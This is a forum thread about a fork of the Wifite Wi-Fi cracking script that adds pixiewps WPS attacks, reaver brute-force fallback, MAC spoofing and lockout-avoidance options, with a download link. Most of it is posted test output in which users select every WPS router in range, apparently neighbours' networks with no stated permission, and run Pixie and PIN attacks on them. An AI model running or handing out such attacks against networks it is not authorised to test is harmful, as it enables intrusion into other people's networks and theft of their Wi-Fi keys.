Wifite including new pixiewps attack

[aanarchyy]

Figured i would just make it it's own thread so it doesn't get lost in everything else.
Let me know if there are any problems or ideas, still kinda playing around with this and a few other ideas i kinda want to add.

REQUIRES: Need to have pixiewps and t6x modified reaver installed

ADDED: Support for new pixiewps attack, attempts a pixiewps attack and if successful passes the key to reaver to test. If fails, continues 11,000 key brute force with reaver.
Now reports if wps is locked in scanning window(annoyed the excriment out of me that this wasn't shown.)

ToDo: Maybe add some default pin calculations and checking.
Make attacks a little more chipset specific(like attemting pin 42000648 on known vulnerable routers, etc...)
Add option to mdk3 the poopies out of AP in hopes of reseting it.(can't hurt)
Add a dummy-check to not bork out if modified-reaver or pixiewps isn't installed... :-/

Changelog:
04202015 - added timeout to script to avoid hanging if ap doesn't respond
added flag -pixiet <sec> #adjust timeout of pixie attack
added flag -ponly #only use pixiewps attack on selected wps networks,
fixed ctrl^c issue, will now ask to continue or exit completely
04212015 - added option to skip psk retreaval upon successful pixiewps attack, now runs reaver by default
04222015 - added updater just run ./wifite -update to update to this fork instead of original wifite
fixed timer
fixed issue with new airmon-ng not creating monitor interface
04232015 - fixed -mac not really anonymizing mac address
added -endless flag to loop through targets
made cracked.txt human readable(tab delimited instead of chr(0))
fixed issue with -paddto not working
can now anonymize iface already in monitor mode(via macchanger)

Download:

https://github.com/aanarchyy/wifite-mod-pixiewps

[nuroo]

Nice, glad you added new pixie attacks. Wifite is great program. Used it exclusively until pixiewps, and new reavers came out. Then I had to use the command line more.

Wifite is also one the the few programs that handles new airmon-ng, well.
new airmon-ng example:
airmon-ng wlan3 = wlan3mon (not mon0)

Im out at the moment, but wifite definitely worked when new airmon-ng already created new monitor interface, then run wifite. Cant remember if could create and use monitor interface of new airmon-ng from beginning. I'll report back

I'll test this new version for both cases when I get home

[aanarchyy]

Nice, glad you added new pixie attacks. Wifite is great program. Used it exclusively until pixiewps, and new reavers came out. Then I had to use the command line more.

Wifite is also one the the few programs that handles new airmon-ng, well.
new airmon-ng example:
airmon-ng wlan3 = wlan3mon (not mon0)

Im out at the moment, but wifite definitely worked when new airmon-ng already created new monitor interface, then run wifite. Cant remember if could create and use monitor interface of new airmon-ng from beginning. I'll report back

I'll test this new version for both cases when I get home

Let me know how it works, if it doesn't, then i should be able to fix it. I havent updated aircrack to test it yet but if it worked in wifite before, it should now also. I am obviously not the author nor even a contributor to wifite, this is just my own little 'fork' that i have found very usefull for myself, and i am releasing it incase it is usefull for anyone else.

[nuroo]

Can confirm modified script works if monitor already running. Script picks up wlan3mon right away, and does its thing. If monitor interface is not running, scripts creates it. But since airmon-ng no longer produces mon0, it gets suck in a loop.

This is only a problem for those that upgraded aircrack-ng suite. Im sure its flawless for everyone else.

[aanarchyy]

Can confirm modified script works if monitor already running. Script picks up wlan3mon right away, and does its thing. If monitor interface is not running, scripts creates it. But since airmon-ng no longer produces mon0, it gets suck in a loop.

This is only a problem for those that upgraded aircrack-ng suite. Im sure its flawless for everyone else.

Will see if i can fix the monitor creation part of it, like i said, not the origional creator of wifite ;-)
Can you confirm the pixiewps portion i added works?

[nuroo]

I had a hard times running it at first. The orginal wifite gets run, even if u run from downloaded directory. I renamed original and went back to download directory and yours ran.

I can confirm pixiewps portion does work.

ctrl c, doesn't function like old script however. for instance if attacking 10 targets. If I ctrl c, on 3rd target script ends. Doesn't target 4th. Or option to continue.

I would like some timeouts for pixie attack. Needed. reaver will wait for long time for beacons, whole script hangs.

[aanarchyy]

I had a hard times running it at first. The orginal wifite gets run, even if u run from downloaded directory. I renamed original and went back to download directory and yours ran.

I can confirm pixiewps portion does work.

ctrl c, doesn't function like old script however. for instance if attacking 10 targets. If I ctrl c, on 3rd target script ends. Doesn't target 4th. Or option to continue.

I would like some timeouts for pixie attack. Needed. reaver will wait for long time for beacons, whole script hangs.

Yeah the ctrl c part i have already noticed also and is on my list, still trying to figure out how the whole script meshes together.
And yeah, i also noticed the hang while waiting for beacon, yeah a timeout is a good idea, ill look for a way to put that in.

Thanks for helping me test this

EDIT: Updated wifite to now timeout after 60 seconds(may make this configurable in the future) if pixiepws is not successful and move on to a regular reaver brute force. Though chances are that if the pixiewps attack fails, more than likely it's a reception/lockout issue in which a regular reaver brute-force attack would also fail.

Bear with me, kinda learning python as i do this

[tuongnv3]

Will see if i can fix the monitor creation part of it, like i said, not the origional creator of wifite ;-)
Can you confirm the pixiewps portion i added works?

You have fixed it yet?

[nuroo]

Good news aanarchyy. Im happy to help. Awesome job so far. I wanna learn scripting too, for now help test.

Will try new version, report back.

[nuroo]

Just so I can run original and your wifite, I renamed yours wifitemod:

Heres output with new version with pixiewps timeout:

Code:

~/wifite-mod-pixiewps-master# ./wifitemod -wps

  .;'                     `;,    
 .;'  ,;'             `;,  `;,   WiFite v2 (r85)
.;'  ,;'  ,;'     `;,  `;,  `;,  
::   ::   :   ( )   :   ::   ::  automated wireless auditor
':.  ':.  ':. /_\ ,:'  ,:'  ,:'  
 ':.  ':.    /___\    ,:'  ,:'   designed for Linux
  ':.       /_____\      ,:'     
           /       \             

modified by aanarchyy([email protected])
Credits to wiire,DataHead,soxrok2212,nxxxu

 [+] targeting WPS-enabled networks

 [+] scanning for wireless devices...
 [+] initializing scan (mon0), updates at 5 sec intervals, CTRL+C when ready.
 [0:00:04] scanning wireless networks. 0 targets and 0 clients found   

 [+] scanning (mon0), updates at 5 sec intervals, CTRL+C when ready.

   NUM ESSID                 CH  ENCR  POWER  WPS?  CLIENT
   --- --------------------  --  ----  -----  ----  ------
    1  DG167****              1  WPA2  36db   Locked 
    2  FiOS-S****             1  WPA2  23db   wps 
    3  SprintGatew****      1  WPA2  21db   wps 

 [0:00:32] scanning wireless networks. 3 targets and 2 clients found   
 [+] checking for WPS compatibility... done
 [+] removed 47 non-WPS-enabled targets

   NUM ESSID                 CH  ENCR  POWER  WPS?  CLIENT
   --- --------------------  --  ----  -----  ----  ------
    1  DG167****              1  WPA2  36db   Locked 
    2  TG167****             11  WPA2  25db   wps 
    3  FiOS-S****             1  WPA2  24db   wps 
    4  TDS                    6  WPA2  22db   wps 
    5  TG167****              1  WPA2  21db   wps 
    6  MiamiHEAT             11  WPA2  20db   wps 
    7  U10C0****             1  WPA   18db   wps 
    8  SprintGate****      1  WPA2  18db   wps 
    9  DIRECT-pm-BR****       1  WPA2  18db   wps 
   10  DG167****              1  WPA2  15db   wps 

 [+] select target numbers (1-10) separated by commas, or 'all': all

 [+] 10 targets selected.

 [0:00:00] initializing PixieWPS attack on DG167**** (...........:73:90)
 [+] E-Nonce found
 [+] PKE hash found
 [+] PKR hash found

 [!] unable to complete successful try in 60 seconds
 [+] skipping pixiewps on DG167****

 [+] Pixiewps attack failed!

 [0:00:00] initializing WPS PIN attack on DG167**** (...........:73:90)
^C0:00:18] WPS attack, 0/0 success/ttl, 
 (^C) WPS brute-force attack interrupted

 [+] 9 targets remain
 [+] what do you want to do?
     [c]ontinue attacking targets
     [e]xit completely
 [+] please make a selection (c, or e): c

 [0:00:00] initializing PixieWPS attack on TG167**** (...........:EC:10)

 [!] unable to complete successful try in 60 seconds
 [+] skipping pixiewps on TG167****

 [+] Pixiewps attack failed!

 [0:00:00] initializing WPS PIN attack on TG167**** (...........:EC:10)
^C0:00:22] WPS attack, 0/0 success/ttl, 
 (^C) WPS brute-force attack interrupted

 [+] 8 targets remain
 [+] what do you want to do?
     [c]ontinue attacking targets
     [e]xit completely
 [+] please make a selection (c, or e): c

 [0:00:00] initializing PixieWPS attack on FiOS-S**** (...........:EC:C2)
 [+] E-Nonce found
 [+] PKE hash found
 [+] PKR hash found
 [+] E-Hash1 found
 [+] E-Hash2 found
Traceback (most recent call last):
  File "./wifitemod", line 3124, in <module>
    main()
  File "./wifitemod", line 321, in main
    need_handshake = not wps_attack(iface, t)
  File "./wifitemod", line 2912, in wps_attack
    line = f.readline()
UnboundLocalError: local variable 'f' referenced before assignment

Timeout for pixie worked. but another error above.
Please make pixie timeout configureable.
also option if pixewps fail, no brutefructe, move to next target.
Please consider because failed attempt locked router

Code:

For those wondering what reavers -P option is intended for:

Option (-P) in reaver puts reaver into a loop mode that does not do the  WPS protocol to or past the M4 message to hopefully avoid lockouts. This  is to ONLY be used for PixieHash collecting to use with pixiewps, NOT  to 'online' bruteforce pins.
This option was made with intent of:

----Collecting repetitive hashes for further comparison and or analysis / discovery of new vulnerable chipsets , routers etc..

----Time sensistive attacks where the hash collecting continues repetitively until your time frame is met.

----For scripting purposes of whom want to use a possible lockout preventable way of PixieHash gathering for your Use case.                         
by datahead

[aanarchyy]

@noruu fixed typo and added added pixie-loop, will be adding a configureable timeout option for pixie attack and will also add option to only attempt pixie attacks(good idea, i like that)

[nuroo]

Test parameters:
Internal wifi card only, quick and dirty.
Time limited. Netbook with internal wifi card, so all but one targets where to far away.
The one that was close enough for pixie/reaver attack, the script errored during pixie attack.

Observations:
The script handled configurable timeout well. (targets to far anyway)

When crtl C pressed the script moved on to next target well.

Need the timer for pixie attack, like timer for wps pin attack.
(cursor just hangs during pixie. countdown if possible)

Todo:
I will test script for fails, against more targets and with a stronger external usb wifi card and then post later.

Code:

root***:~/wifite-mod-pixiewps-master# ./wifitemod -wps -pixiet 90

  .;'                     `;,    
 .;'  ,;'             `;,  `;,   WiFite v2 (r85)
.;'  ,;'  ,;'     `;,  `;,  `;,  
::   ::   :   ( )   :   ::   ::  automated wireless auditor
':.  ':.  ':. /_\ ,:'  ,:'  ,:'  
 ':.  ':.    /___\    ,:'  ,:'   designed for Linux
  ':.       /_____\      ,:'     
           /       \             

modified by aanarchyy([email protected])
Credits to wiire,DataHead,soxrok2212,nxxxu

 [+] targeting WPS-enabled networks
 [+] pixiewps attack timeout set to 90 seconds

 [+] scanning for wireless devices...
 [+] initializing scan (mon0), updates at 5 sec intervals, CTRL+C when ready.
 [0:00:04] scanning wireless networks. 0 targets and 0 clients found   

 [+] scanning (mon0), updates at 5 sec intervals, CTRL+C when ready.

   NUM ESSID                 CH  ENCR  POWER  WPS?  CLIENT
   --- --------------------  --  ----  -----  ----  ------
    1  DG167****              1  WPA2  33db   Locked 
    2  TDS                    6  WPA2  17db   wps 

 [0:00:25] scanning wireless networks. 2 targets and 2 clients found   

 [+] scanning (mon0), updates at 5 sec intervals, CTRL+C when ready.

   NUM ESSID                 CH  ENCR  POWER  WPS?  CLIENT
   --- --------------------  --  ----  -----  ----  ------
    1  DG167****              1  WPA2  34db   Locked 
    2  TDS                    6  WPA2  24db   wps 
    3  TG167****              1  WPA2  21db   wps 
    4  FiOS-S****            1  WPA2  19db   wps 
    5  HAL9000                6  WPA2  15db   wps 

 [0:00:48] scanning wireless networks. 5 targets and 9 clients found   

 [+] scanning (mon0), updates at 5 sec intervals, CTRL+C when ready.

   NUM ESSID                 CH  ENCR  POWER  WPS?  CLIENT
   --- --------------------  --  ----  -----  ----  ------
    1  DG167****              1  WPA2  34db   Locked 
    2  TDS                    6  WPA2  23db   wps 
    3  TG167****              1  WPA2  21db   wps 
    4  FiOS-S****             1  WPA2  16db   wps 
    5  HAL9000                6  WPA2  15db   wps 

 [0:01:11] scanning wireless networks. 5 targets and 13 clients found   
 [+] checking for WPS compatibility... done
 [+] removed 49 non-WPS-enabled targets

   NUM ESSID                 CH  ENCR  POWER  WPS?  CLIENT
   --- --------------------  --  ----  -----  ----  ------
    1  DG167****              1  WPA2  34db   Locked 
    2  TDS                    6  WPA2  24db   wps 
    3  TG167****              1  WPA2  20db   wps 
    4  DG167****              1  WPA2  19db   wps 
    5  FiOS-S****             1  WPA2  17db   wps 
    6  HAL9000                6  WPA2  15db   wps 

 [+] select target numbers (1-6) separated by commas, or 'all': all

 [+] 6 targets selected.

 [0:00:00] initializing PixieWPS attack on DG16**** (00:00:00:00:73:90)

 [!] unable to complete successful try in 90 seconds
 [+] skipping pixiewps on DG167****

 [+] Pixiewps attack failed!

 [0:00:00] initializing WPS PIN attack on DG167**** (00:00:00:00:73:90)
^C0:00:12] WPS attack, 0/0 success/ttl, 
 (^C) WPS brute-force attack interrupted

 [+] 5 targets remain
 [+] what do you want to do?
     [c]ontinue attacking targets
     [e]xit completely
 [+] please make a selection (c, or e): c

 [0:00:00] initializing PixieWPS attack on TDS (00:00:00:00:1B:C6)

 [!] unable to complete successful try in 90 seconds
 [+] skipping pixiewps on TDS

 [+] Pixiewps attack failed!

 [0:00:00] initializing WPS PIN attack on TDS (00:00:00:00:1B:C6)
^C0:00:25] WPS attack, 0/0 success/ttl, 
 (^C) WPS brute-force attack interrupted

 [+] 4 targets remain
 [+] what do you want to do?
     [c]ontinue attacking targets
     [e]xit completely
 [+] please make a selection (c, or e): c

 [0:00:00] initializing PixieWPS attack on TG167**** (00:00:00:00:8F:20)

 [!] unable to complete successful try in 90 seconds
 [+] skipping pixiewps on TG167****

 [+] Pixiewps attack failed!

 [0:00:00] initializing WPS PIN attack on TG167**** (00:00:00:00:8F:20)
^C0:00:22] WPS attack, 0/0 success/ttl, 
 (^C) WPS brute-force attack interrupted

 [+] 3 targets remain
 [+] what do you want to do?
     [c]ontinue attacking targets
     [e]xit completely
 [+] please make a selection (c, or e): c

 [0:00:00] initializing PixieWPS attack on DG167**** (00:00:00:00:C4:60)

 [!] unable to complete successful try in 90 seconds
 [+] skipping pixiewps on DG167****

 [+] Pixiewps attack failed!

 [0:00:00] initializing WPS PIN attack on DG167**** (00:00:00:00:C4:60)
^C0:00:08] WPS attack, 0/0 success/ttl, 
 (^C) WPS brute-force attack interrupted

 [+] 2 targets remain
 [+] what do you want to do?
     [c]ontinue attacking targets
     [e]xit completely
 [+] please make a selection (c, or e): c

 [0:00:00] initializing PixieWPS attack on FiOS-S**** (00:00:00:00:EC:C2)
 [+] E-Nonce found
 [+] PKE hash found
 [+] PKR hash found
 [+] E-Hash1 found
 [+] E-Hash2 found
Traceback (most recent call last):
  File "./wifitemod", line 3134, in <module>
    main()
  File "./wifitemod", line 321, in main
    need_handshake = not wps_attack(iface, t)
  File "./wifitemod", line 2931, in wps_attack
    os.remove(temp + "reaver_err.out")
OSError: [Errno 2] No such file or directory: '/tmp/wifite0jkPaB/reaver_err.out'
root@****:~/wifite-mod-pixiewps-master#

Great progress !!

[nuroo]

Also on little netbook that I havent upgraded aircrack-ng suite, interface creation/usage perfect.

[aanarchyy]

Updated!
Added -pixiet <sec> to configure pixiewps timeout
Added -ponly to set to only attack using pixiewps
Fixed ctrl^c issue

[nuroo]

Code:

root@kali:~/wifite-mod-pixiewps-master# ./wifitemod -ponly -pixiet 45

  .;'                     `;,    
 .;'  ,;'             `;,  `;,   WiFite v2 (r86)
.;'  ,;'  ,;'     `;,  `;,  `;,  
::   ::   :   ( )   :   ::   ::  automated wireless auditor
':.  ':.  ':. /_\ ,:'  ,:'  ,:'  
 ':.  ':.    /___\    ,:'  ,:'   designed for Linux
  ':.       /_____\      ,:'     
           /       \             

modified by aanarchyy([email protected])
Credits to wiire,DataHead,soxrok2212,nxxxu

 [+] Pixiewps attack only enabled
 [+] pixie attack timeout set to 45 seconds

 [+] scanning for wireless devices...
 [+] initializing scan (mon0), updates at 5 sec intervals, CTRL+C when ready.
 [0:00:04] scanning wireless networks. 0 targets and 0 clients found   

 [+] scanning (mon0), updates at 5 sec intervals, CTRL+C when ready.

   NUM ESSID                 CH  ENCR  POWER  WPS?  CLIENT
   --- --------------------  --  ----  -----  ----  ------
    1  \x00\x00\x001000   6  WPA2  65db   wps 
    2  b0c554a1000           1  WPA2  64db   wps 
    3  DVW32011000             1  WPA2  56db   wps 
    4  atlantis201000       10  WPA2  53db   wps 
    5  WileyR1000            10  WPA2  52db   wps 
    6  DVW321000             1  WPA2  51db   wps 
    7  133 1000  1000             6  WPA2  51db   Locked 
    8  Onyx1100023                1  WPA2  50db   wps 
    9  TommyA1000            6  WPA2  50db   wps 
   10  Kirin1000              1  WPA2  49db   wps 
   11  DG16701000             11  WPA2  48db   wps 
   12  We hear y1000  6  WPA2  48db   wps 
   13  \x00\x00\1000       11  WPA2  47db   wps 
   14  DG11000             11  WPA2  46db   wps 
   15  DG11000              1  WPA2  45db   Locked 
   16  Tuppy Gl1000          6  WPA2  45db   Locked 
   17  lind1000          11  WPA2  44db   wps 
   18  DG11000              1  WPA2  40db   Locked 

 [0:00:06] scanning wireless networks. 18 targets and 3 clients found   

 [+] scanning (mon0), updates at 5 sec intervals, CTRL+C when ready.

   NUM ESSID                 CH  ENCR  POWER  WPS?  CLIENT
   --- --------------------  --  ----  -----  ----  ------
    1  \x00\x00\x001000   6  WPA2  65db   wps 
    2  b0c554a1000           1  WPA2  64db   wps 
    3  DVW32011000             1  WPA2  56db   wps 
    4  atlantis201000       10  WPA2  53db   wps 
    5  WileyR1000            10  WPA2  52db   wps 
    6  DVW321000             1  WPA2  51db   wps 
    7  133 1000  1000             6  WPA2  51db   Locked 
    8  Onyx1100023                1  WPA2  50db   wps 
    9  TommyA1000            6  WPA2  50db   wps 
   10  Kirin1000              1  WPA2  49db   wps 
   11  DG16701000             11  WPA2  48db   wps 
   12  We hear y1000  6  WPA2  48db   wps 
   13  \x00\x00\1000       11  WPA2  47db   wps 
   14  DG11000             11  WPA2  46db   wps 
   15  DG11000              1  WPA2  45db   Locked 
   16  Tuppy Gl1000          6  WPA2  45db   Locked 
   17  lind1000          11  WPA2  44db   wps 
   18  DG11000              1  WPA2  40db   Locked 

 [0:00:21] scanning wireless networks. 18 targets and 3 clients found   

 [+] scanning (mon0), updates at 5 sec intervals, CTRL+C when ready.

   NUM ESSID                 CH  ENCR  POWER  WPS?  CLIENT
   --- --------------------  --  ----  -----  ----  ------
    1  \x00\x00\x001000   6  WPA2  65db   wps 
    2  b0c554a1000           1  WPA2  64db   wps 
    3  DVW32011000             1  WPA2  56db   wps 
    4  atlantis201000       10  WPA2  53db   wps 
    5  WileyR1000            10  WPA2  52db   wps 
    6  DVW321000             1  WPA2  51db   wps 
    7  133 1000  1000             6  WPA2  51db   Locked 
    8  Onyx1100023                1  WPA2  50db   wps 
    9  TommyA1000            6  WPA2  50db   wps 
   10  Kirin1000              1  WPA2  49db   wps 
   11  DG16701000             11  WPA2  48db   wps 
   12  We hear y1000  6  WPA2  48db   wps 
   13  \x00\x00\1000       11  WPA2  47db   wps 
   14  DG11000             11  WPA2  46db   wps 
   15  DG11000              1  WPA2  45db   Locked 
   16  Tuppy Gl1000          6  WPA2  45db   Locked 
   17  lind1000          11  WPA2  44db   wps 
   18  DG11000              1  WPA2  40db   Locked 
   19  linda1000           11  WPA2  45db   wps 
   20  \x00\x00\x00\x00\...  11  WPA2  45db   wps 
   21  ZOOM                   6  WPA2  44db   wps 
   22  DG1671000              1  WPA2  41db   Locked 
   23  McPo1000               6  WPA2  40db   wps 
   24  DG1671000              1  WPA2  40db   Locked 

 [0:00:29] scanning wireless networks. 24 targets and 14 clients found   
 [+] checking for WPS compatibility... done
 [+] removed 35 non-WPS-enabled target


   NUM ESSID                 CH  ENCR  POWER  WPS?  CLIENT
   --- --------------------  --  ----  -----  ----  ------
    1  \x00\x00\x001000   6  WPA2  65db   wps 
    2  b0c554a1000           1  WPA2  64db   wps 
    3  DVW32011000             1  WPA2  56db   wps 
    4  atlantis201000       10  WPA2  53db   wps 
    5  WileyR1000            10  WPA2  52db   wps 
    6  DVW321000             1  WPA2  51db   wps 
    7  133 1000  1000             6  WPA2  51db   Locked 
    8  Onyx1100023                1  WPA2  50db   wps 
    9  TommyA1000            6  WPA2  50db   wps 
   10  Kirin1000              1  WPA2  49db   wps 
   11  DG16701000             11  WPA2  48db   wps 
   12  We hear y1000  6  WPA2  48db   wps 
   13  \x00\x00\1000       11  WPA2  47db   wps 
   14  DG11000             11  WPA2  46db   wps 
   15  DG11000              1  WPA2  45db   Locked 
   16  Tuppy Gl1000          6  WPA2  45db   Locked 
   17  lind1000          11  WPA2  44db   wps 
   18  DG11000              1  WPA2  40db   Locked 
   19  linda1000           11  WPA2  45db   wps 
   20  \x00\x00\x00\x00\...  11  WPA2  45db   wps 
   21  ZOOM                   6  WPA2  44db   wps 
   22  DG1671000              1  WPA2  41db   Locked 
   23  McPo1000               6  WPA2  40db   wps 
   24  DG1671000              1  WPA2  40db   Locked 
   25  McP1000               6  WPA2  42db   wps   client
   26  DG1671000              1  WPA2  42db   Locked 
   27  DG1671000              1  WPA2  41db   Locked 
   28  TG1671000              6  WPA2  40db   wps 
   29  THWL9                  1  WPA2  38db   wps 

 [+] select target numbers (1-29) separated by commas, or 'all': all

 [+] 29 targets selected.

 [0:00:00] initializing PixieWPS attack on \x00\x00\x00\x00\x00\x 1000:79:0F)

 [!] unable to complete successful try in 45 seconds
 [+] skipping pixiewps on \x00\x00\x00\x00\x00\x

 [!] unable to complete successful try in 45 seconds
 [+] skipping pixiewps on \x00\x00\x00\x00\x00\x

 [!] unable to complete successful try in 45 seconds
 [+] skipping pixiewps on \x00\x00\x00\x00\x00\x

 [!] unable to complete successful try in 45 seconds
 [+] skipping pixiewps on \x00\x00\x00\x00\x00\x

 [!] unable to complete successful try in 45 seconds
 [+] skipping pixiewps on \x00\x00\x00\x00\x00\x

 [!] unable to complete successful try in 45 seconds
 [+] skipping pixiewps on \x00\x00\x00\x00\x00\x

 [!] unable to complete successful try in 45 seconds
 [+] skipping pixiewps on \x00\x00\x00\x00\x00\x

 [!] unable to complete successful try in 45 seconds
 [+] skipping pixiewps on \x00\x00\x00\x00\x00\x
^C
 (^C) WPS brute-force attack interrupted

 [+] 28 targets remain
 [+] what do you want to do?
     [c]ontinue attacking targets
     [e]xit completely
 [+] please make a selection (c, or e): c


 (^C) WPS brute-force attack interrupted

 [+] 27 targets remain
 [+] what do you want to do?
     [c]ontinue attacking targets
     [e]xit completely
 [+] please make a selection (c, or e): c

 [+] Pixiewps attack failed!

 [0:00:00] initializing PixieWPS attack on b0c554a1000 (1000:A7:86)

 [!] unable to complete successful try in 45 seconds
 [+] skipping pixiewps on b0c554a1000

 [!] unable to complete successful try in 45 seconds
 [+] skipping pixiewps on b0c554a1000

 [!] unable to complete successful try in 45 seconds
 [+] skipping pixiewps on b0c554a1000

 [!] unable to complete successful try in 45 seconds
 [+] skipping pixiewps on b0c554a1000

 [!] unable to complete successful try in 45 seconds
 [+] skipping pixiewps on b0c554a1000
^C
 (^C) WPS brute-force attack interrupted

 [+] 26 targets remain
 [+] what do you want to do?
     [c]ontinue attacking targets
     [e]xit completely
 [+] please make a selection (c, or e): ^C
 (^C) WPS brute-force attack interrupted

 [+] 26 targets remain
 [+] what do you want to do?
     [c]ontinue attacking targets
     [e]xit completely
 [+] please make a selection (c, or e): ^CTraceback (most recent call last):
  File "./wifitemod", line 3150, in <module>
    if attack_interrupted_prompt():
  File "./wifitemod", line 1801, in attack_interrupted_prompt
    ri = raw_input(GR+' [+]'+W+' please make a selection (%s): ' % options)
KeyboardInterrupt

Stuck in loop after pixie attack fails

[nuroo]

if ./wifite -pixiet (no time given)

script handles ./wifite -pixiet<null> nicely.

Also in previous version -ponly had no acknolegdement of being set to active, this version says its active.

[aanarchyy]

[CODE]

Stuck in loop after pixie attack fails

Yeah, just noticed that also, gimme a min to fix, just had it fixed then testbed crashed so i gotta remember what i did... :-/

Edit: Should be fixed now. I want to thank you again for helping me test this

[nuroo]

./wifite -ponly -pixiet 75 -pow 35

Worked no errors. 8 targets. Ctrl'C on a few I knew wouldn't crack, no crash. -NICE

No successful pixie attack though. Gonna increase timeout test pixie attack portion.

[nuroo]

When given enough info for successful attack against known vulnerable AP:
[0:00:00] initializing PixieWPS attack on DG167000 (0000000:27:80)
[+] E-Nonce found
[+] PKE hash found
[+] PKR hash found
[+] Authkey found
[+] E-Hash1 found
[+] E-Hash2 found
script seems to stand still, no error but no output

Is that because -P option used in reaver? If -P option loop used, so no M4, so no wps lockout?

If so Then do you feed successful results to offline pixie attack to obtain pin? the new reaver to test pin?

[soxrok2212]

When given enough info for successful attack against known vulnerable AP:
[0:00:00] initializing PixieWPS attack on DG167000 (0000000:27:80)
[+] E-Nonce found
[+] PKE hash found
[+] PKR hash found
[+] Authkey found
[+] E-Hash1 found
[+] E-Hash2 found
script seems to stand still, no error but no output

Is that because -P option used in reaver? If -P option loop used, so no M4, so no wps lockout?

If so Then do you feed successful results to offline pixie attack to obtain pin? the new reaver to test pin?

Yeah, the -P switch will stop M4 from being sent at all. Just run reaver after and supply the correct pin.

[aanarchyy]

Yeah, didn't exit the loop properly, oops! O.o
Should be all fixed now

[SubZero5]

@aanarchyy,
Is your Wifite based on derv82 's code?
As I recall bwall, drone and brianpow consecutively modified the Wifite code to r95.
Latest Wifite was on https://github.com/brianpow/wifite afaik...

[nuroo]

Posted two new issues to your git, aanarchyy.

Question - if wifite finds a client, does it spoof the mac of client?
Question - if mon0 is already started a fake mac address, does wifite pass the fake/spoofed mac address when using reaver (ex. reaver -i mon0 -b 11:22:33:44:55:66 --mac=00:11:00:11:00:11 -vv -S -K1)

[nuroo]

deleted double post

[nuroo]

@aanarchyy,
Is your Wifite based on derv82 's code?
As I recall bwall, drone and brianpow consecutively modified the Wifite code to r95.
Latest Wifite was on https://github.com/brianpow/wifite afaik...

just checked out that version SubZero. Nice. alots of cool improvements. But it came out b4 pixiewps and modded reaver, so lacking that functionality.

[aanarchyy]

@Subzero5
The one i am working with is the one that came on Kali. I may update it and add my patches in soon. Any specific features in that one?

@nuroo
1) No, but that was an idea i had been thinking of adding in.
2) If it's already spoofed, there is no reason to use the --mac flag as it is already spoofed.
3) Check the first issue you posted on github and confirm it's fixed for me please :-)

Updated to now run reaver automatically unless explicitly told to skip psk retrevial vai -pixienopsk flag

Still trying to figure out the whole updating timer thing, picking up python as i go along here

[nuroo]

Im pretty sure reaver doesnt use spoofed mac address for monitor unless --mac option is given.


i'll test for same issue now. but maybe results later, quick lunch

[nuroo]

airmon-ng also does not copy spoofed mac address to monitor. after airmon-ng creates monitor, i still take it down and run macchanger and assign same spoofed mac address to monitor. that is the reason I always create monitor before running wifite........i believe thats the reason for --mac in reaver.

[nuroo]

Consider a version or revision number.....for us track changes/fixes. and to know if im reporting on current revision.

[aanarchyy]

What behavior were you thinking for the spoofing part?

Specify address to spoof at command line?
Wait until client found then start attack with spoofed address?
Start attacking unspoofed and watch at same time, and when client found, restart attack with spoofed address?
If multiple clients found, rotate addresses so often?

[nuroo]

aanarchyy only because you asked, other wifite -h output.........no pressure.

Code:

 .;'                     `;,    
 .;'  ,;'             `;,  `;,   WiFite v2 (r95)
.;'  ,;'  ,;'     `;,  `;,  `;,  
::   ::   :   ( )   :   ::   ::  automated wireless auditor
':.  ':.  ':. /_\ ,:'  ,:'  ,:'  
 ':.  ':.    /___\    ,:'  ,:'   designed for Linux
  ':.       /_____\      ,:'     
           /       \             

usage: wifite92.py [-h] [--check [file]] [--cracked] [--recrack] [-i [wlanN]]
                   [--mac] [-m [monN]] [--tx [N]] [-l [file]] [-v [file]]
                   [-s [filters]] [-t [criteria]] [-c [N]] [--power [N]]
                   [--all] [-r [N]] [--showb] [-2] [-q] [-a [filters]]
                   [-e [SSID]] [-b [BSSID]] [--wpa] [--wpat [secs]] [--nowpa]
                   [--wpadt [secs]] [--strip] [--crack CRACK] [--dict [file]]
                   [--hash [file]] [--recapture] [--aircrack] [--pyrit]
                   [--tshark] [--cowpatty] [--wep] [--pps [N]] [--wept [secs]]
                   [--chopchop] [--arpreplay] [--fragment] [--caffelatte]
                   [--p0841] [--hirte] [--nofakeauth] [--wepca [N]]
                   [--wepnosave] [--wepsaveiv] [--wps] [--nowps]
                   [--wpst [secs]] [--wpsratio [ratio]] [--wpsretry [N]]
                   [--wpssave] [--update] [--debug]

optional arguments:
  -h, --help            show this help message and exit

COMMAND:
  --check [file]        Check capfile [file] for handshakes.
  --cracked             Display previously cracked access points.
  --recrack             Include already cracked networks in targets.

INTERFACE:
  -i [wlanN]            Wireless interface for capturing.
  --mac                 Anonymize MAC address.
  -m [monN], --mon-iface [monN]
                        Interface already in monitor mode.
  --tx [N]              Set adapter TX power level.

TARGET:
  -l [file], --load [file]
                        Load airodump file instead of scanning.
  -v [file], --save [file]
                        Save airodump file.
  -s [filters], --show [filters]
                        Filter targets in scanning state.Syntax: numbers,
                        range (e.g. "1-4"), power level (e.g.
                        "p[>,>=,=,<=,<][POWER]"), channel (e.g.
                        "c[CHANNEL,range])", wps disabled or enabled (e.g.
                        "wps0", "wps1"), Cipher (e.g. "wep" or "wpa", "wep[NUM
                        OF CLIENT]" or "wpa[NUM OF CLIENT]", "wep+" or "wpa+"
                        for network with clients), ESSID (e.g. "e[ESSID]") or
                        BSSID (e.g. "b[11:22:33]"). Multiple filters separated
                        by comma supported. Add "-" or "=" before to remove
                        targets.
  -t [criteria], --timeout [criteria]
                        Criteria to stop scanning state. Numbers = seconds,
                        e[ESSID][+] or b[BSSID][+]= timeout when target is
                        found, add "+" at the end means "with clients",
                        n[>,>=,=,<=,<][num of targets] = timeout when total
                        targets more/equal/less than certain numbers. Multiple
                        criteria separated by comma supported.
  -c [N], --channel [N]
                        Filter targets with specific channel in scanning state
                        (equivalent to "--show c[N]").
  --power [N]           Filter targets with signal strength > [N] in scanning
                        state (equivalent to "--show p\>[N]").
  --all                 Attack all targets (equivalent to "--show all --attack
                        all --timeout 10").
  -r [N], --row [N]     Max numbers of row to show in scanning state.
  --showb               Show target BSSIDs in scanning state.
  -2, --two             Show scanning result in two columns.
  -q, --quiet           Do not list found networks during scan.
  -a [filters], --attack [filters]
                        Automatically select targets after scanning state,
                        same syntas as "--show".
  -e [SSID], --essid [SSID]
                        Attack target immediately once ssid (name) is found in
                        scanning state.
  -b [BSSID], --bssid [BSSID]
                        Attack target immediately once bssid (mac) is found in
                        scanning state.

WPA:
  --wpa                 Only show WPA networks in scanning state (works with
                        --wps --wep, equivalent to "--show wpa --nowps").
